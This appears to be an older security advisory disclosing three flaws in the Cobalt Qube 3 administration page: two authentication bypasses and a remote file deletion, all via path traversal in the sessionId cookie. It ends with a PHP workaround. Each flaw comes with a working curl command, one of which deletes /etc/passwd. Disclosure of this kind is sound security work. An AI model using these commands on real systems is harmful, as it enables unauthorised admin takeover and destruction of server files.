COMMAND

	Cobalt Qube administration page various vulns

SYSTEMS AFFECTED

	Cobalt Qube 3 (Cobalt  Linux  release  6.0  (Carmel)Kernel  2.2.16C7  on
	i586)

PROBLEM

	pokleyzz  [pokleyzz@scan-associates.net],  sk   [sk@scan-associates.net]
	and   shaharil   [shaharil@scan-associates.net]    of    scan-associates
	[http://www.scan-associates.net] found :
	

	

	Problem 1: Local Privilege Escalation to Admin
	

	Any user with ability to create file in any location of a Cobalt  server
	will be able to promote to Admin access  of  the  System  Management.  A
	user may create a file in /tmp/test and crafted a  cookie  to  login  as
	Admin without password:
	

	Create dummy session file in Cobalt server:
	

	$ printf "admin" > /tmp/test

	

	Login without password from anywhere:
	

	$ curl -b sessionId=/../../../../../../tmp/test\;loginName=admin

	http://192.168.0.1:444/splashAdmin.php

	

	

	Problem 2: Remote User access
	

	We also found out that if the User account  is  newly  created,  we  can
	bypass the authentication without a need to create  dummy  session  file
	in the server:
	

	$curl -b sessionId=../codb/objects/4/.name\;loginName=admin

	http://192.168.0.1:444/splashAdmin.php

	

	

	Problem 3: Remotely delete file
	

	It is possible to delete file from the server by specifying the path  to
	the file and the first 31 characters of the file. The following  example
	will delete the /etc/passwd file from the server:
	

	$curl -b

	sessionId=../../../../../../../../etc/passwd\;loginName=root:x:0:0:root:/root:/bin/bash 

	http://192.168.0.1:444/splashAdmin.php

	

	note : curl can be download from http://curl.haxx.se/download.html

SOLUTION

	 Workaround

	 ==========

	

	In /usr/sausalito/ui/libPhp/ServerScriptHelper.php
	

	line 64:
	

	$sessionId = ereg_replace("\.\.","",$sessionId);